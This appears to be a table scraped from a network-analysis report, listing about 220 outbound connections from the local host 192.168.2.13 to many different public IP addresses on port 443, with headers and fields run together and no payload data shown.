                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14625192.168.2.133975669.116.178.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14626192.168.2.1347194108.172.10.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14627192.168.2.135122265.179.218.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14628192.168.2.133795080.253.42.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14629192.168.2.135893057.152.70.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14630192.168.2.1355624156.216.88.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14631192.168.2.1337460210.105.112.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14632192.168.2.1350162169.23.174.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14633192.168.2.1339456197.126.245.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14634192.168.2.1334246155.10.63.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14635192.168.2.1360362219.192.218.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14636192.168.2.1354738130.52.192.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14637192.168.2.135268491.14.48.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14638192.168.2.1354162176.20.126.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14639192.168.2.135519483.16.246.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14640192.168.2.1359118106.60.77.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14641192.168.2.1341780116.73.231.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14642192.168.2.135568898.78.212.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14643192.168.2.134553893.196.214.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14644192.168.2.1344398131.116.12.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14645192.168.2.1349930219.54.22.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14646192.168.2.1354440145.184.201.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14647192.168.2.13501964.183.143.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14648192.168.2.1354486216.255.15.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14649192.168.2.1336978168.213.99.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14650192.168.2.135963053.63.60.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14651192.168.2.1359750199.49.221.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14652192.168.2.1346216222.82.83.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14653192.168.2.1333048184.94.123.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14654192.168.2.136039257.62.187.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14655192.168.2.1349510185.169.209.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14656192.168.2.1348896207.108.241.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14657192.168.2.135930218.14.254.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14658192.168.2.1360488189.156.84.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14659192.168.2.1356752204.98.9.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14660192.168.2.1337750149.251.112.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14661192.168.2.133814485.171.106.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14662192.168.2.134926614.155.79.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14663192.168.2.1358014123.108.178.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14664192.168.2.1350378136.136.215.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14665192.168.2.1342102137.183.103.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14666192.168.2.134005236.212.217.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14667192.168.2.133465265.27.41.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14668192.168.2.1339568217.6.132.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14669192.168.2.1349624128.117.205.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14670192.168.2.135035441.5.204.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14671192.168.2.133347488.107.219.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14672192.168.2.134398499.35.43.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14673192.168.2.135065638.120.174.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14674192.168.2.1349034194.184.77.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14675192.168.2.1337936106.18.179.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14676192.168.2.1336882202.114.95.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14677192.168.2.13536701.177.174.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14678192.168.2.135698269.162.216.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14679192.168.2.1342552222.82.19.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14680192.168.2.133947694.224.220.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14681192.168.2.1349482188.210.20.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14682192.168.2.13434061.2.29.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14683192.168.2.1357332169.144.129.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14684192.168.2.134492053.61.122.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14685192.168.2.1343634126.127.247.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14686192.168.2.1356622189.199.3.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14687192.168.2.133675232.158.19.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14688192.168.2.1356742202.28.238.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14689192.168.2.135207846.51.7.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14690192.168.2.1344534183.28.156.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14691192.168.2.1335820221.115.169.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14692192.168.2.1353492203.137.0.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14693192.168.2.1347948212.180.38.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14694192.168.2.1337624103.144.84.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14695192.168.2.1339472105.169.189.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14696192.168.2.1342194177.177.242.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14697192.168.2.134616644.90.245.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14698192.168.2.134121427.92.203.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14699192.168.2.1350698130.146.247.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14700192.168.2.1336038160.194.145.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14701192.168.2.134139639.163.110.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14702192.168.2.1336762157.48.139.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14703192.168.2.1355074156.107.10.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14704192.168.2.133633817.138.74.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14705192.168.2.135503689.51.115.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14706192.168.2.1355878126.14.235.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14707192.168.2.1354556206.118.44.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14708192.168.2.1339550167.43.119.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14709192.168.2.134569447.175.35.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14710192.168.2.135980457.234.130.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14711192.168.2.13548685.180.54.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14712192.168.2.1347936191.69.246.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14713192.168.2.134002693.248.88.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14714192.168.2.1358784163.6.3.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14715192.168.2.133522858.255.207.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14716192.168.2.135836843.52.242.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14717192.168.2.134532481.70.131.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14718192.168.2.1332848208.127.157.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14719192.168.2.134761254.153.174.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14720192.168.2.1347992144.76.223.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14721192.168.2.134035874.22.26.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14722192.168.2.133739465.89.39.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14723192.168.2.1344354104.160.48.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14724192.168.2.1336718205.50.191.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14725192.168.2.134546432.77.198.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14726192.168.2.1333192144.241.59.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14727192.168.2.133930079.173.235.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14728192.168.2.134147252.40.199.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14729192.168.2.133672835.95.116.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14730192.168.2.135350871.29.126.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14731192.168.2.135971685.206.106.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14732192.168.2.1341526179.5.184.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14733192.168.2.133703619.43.109.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14734192.168.2.1355858184.87.101.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14735192.168.2.13353061.11.33.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14736192.168.2.135392683.62.20.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14737192.168.2.135749870.123.226.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14738192.168.2.134523697.96.46.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14739192.168.2.1356688191.41.48.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14740192.168.2.1343228125.33.102.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14741192.168.2.134564666.187.30.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14742192.168.2.1334296170.39.172.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14743192.168.2.1353070112.124.13.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14744192.168.2.134993639.239.134.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14745192.168.2.1346322179.193.46.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14746192.168.2.1339006189.245.223.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14747192.168.2.134425071.65.75.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14748192.168.2.1348796223.61.117.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14749192.168.2.1342972120.73.69.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14750192.168.2.1344626198.94.213.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14751192.168.2.1358076197.164.21.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14752192.168.2.134060880.185.63.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14753192.168.2.1359964195.242.153.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14754192.168.2.1355840131.112.233.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14755192.168.2.1333982194.192.116.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14756192.168.2.134496479.114.73.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14757192.168.2.1348914213.66.75.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14758192.168.2.133530854.12.144.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14759192.168.2.133344670.103.228.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14760192.168.2.1349842108.24.138.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14761192.168.2.134927449.81.2.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14762192.168.2.1337658138.83.196.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14763192.168.2.136078040.190.102.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14764192.168.2.1334116163.104.53.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14765192.168.2.1354874135.213.44.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14766192.168.2.134851857.107.231.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14767192.168.2.1357954142.170.132.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14768192.168.2.13446664.168.155.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14769192.168.2.1358720161.194.127.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14770192.168.2.134419449.24.152.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14771192.168.2.1333232197.246.254.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14772192.168.2.1337078113.203.156.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14773192.168.2.134725470.160.171.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14774192.168.2.1349624164.253.146.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14775192.168.2.1352402142.179.229.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14776192.168.2.133912812.216.40.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14777192.168.2.1358362189.129.185.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14778192.168.2.1340512116.83.224.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14779192.168.2.134667631.151.202.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14780192.168.2.1354482175.63.93.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14781192.168.2.1335284136.232.157.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14782192.168.2.1351290220.10.23.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14783192.168.2.1344734145.121.171.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14784192.168.2.1358994197.121.97.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14785192.168.2.135505294.204.99.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14786192.168.2.1334140114.146.159.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14787192.168.2.1360304148.98.201.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14788192.168.2.13575882.77.195.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14789192.168.2.135254884.103.197.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14790192.168.2.1346734189.254.20.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14791192.168.2.135006661.139.137.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14792192.168.2.1347152109.192.9.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14793192.168.2.135589253.9.42.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14794192.168.2.1353210209.142.197.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14795192.168.2.1347552183.155.146.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14796192.168.2.1338178147.31.109.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14797192.168.2.135933686.138.127.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14798192.168.2.1349336152.82.146.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14799192.168.2.133636695.226.59.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14800192.168.2.1341238117.51.178.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14801192.168.2.135132287.88.175.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14802192.168.2.1342900187.187.227.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14803192.168.2.1333962112.116.66.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14804192.168.2.135637282.158.232.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14805192.168.2.133384852.46.16.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14806192.168.2.1360020198.200.199.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14807192.168.2.1345434168.140.189.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14808192.168.2.1356664173.5.98.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14809192.168.2.1345880156.34.232.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14810192.168.2.1333670131.160.147.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14811192.168.2.1341042110.159.112.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14812192.168.2.134627081.226.10.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14813192.168.2.1342088213.178.130.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14814192.168.2.133415887.44.255.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14815192.168.2.134348040.122.143.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14816192.168.2.135759076.81.36.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14817192.168.2.1359594139.53.39.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14818192.168.2.135065040.50.45.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14819192.168.2.134189843.225.249.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14820192.168.2.134239896.128.35.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14821192.168.2.1343414108.178.137.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14822192.168.2.1342354209.73.124.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14823192.168.2.1340128155.137.58.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14824192.168.2.1338026132.199.69.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14825192.168.2.1352936174.36.209.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14826192.168.2.133953638.67.169.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14827192.168.2.1354798125.57.131.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14828192.168.2.1349068111.124.28.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14829192.168.2.135729097.96.25.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14830192.168.2.13608584.84.109.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14831192.168.2.1341942176.51.111.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14832192.168.2.1333660199.23.51.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14833192.168.2.135001019.149.198.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14834192.168.2.135320448.186.145.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14835192.168.2.134164218.148.57.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14836192.168.2.135983849.57.220.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14837192.168.2.134500672.139.158.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14838192.168.2.1334522170.159.231.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14839192.168.2.1342626163.117.93.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14840192.168.2.135913614.93.1.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14841192.168.2.1349224111.93.239.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14842192.168.2.135608457.104.246.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14843192.168.2.134736090.142.253.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14844192.168.2.134371668.0.141.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14845192.168.2.1347634132.173.21.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14846192.168.2.1352212223.117.61.144443
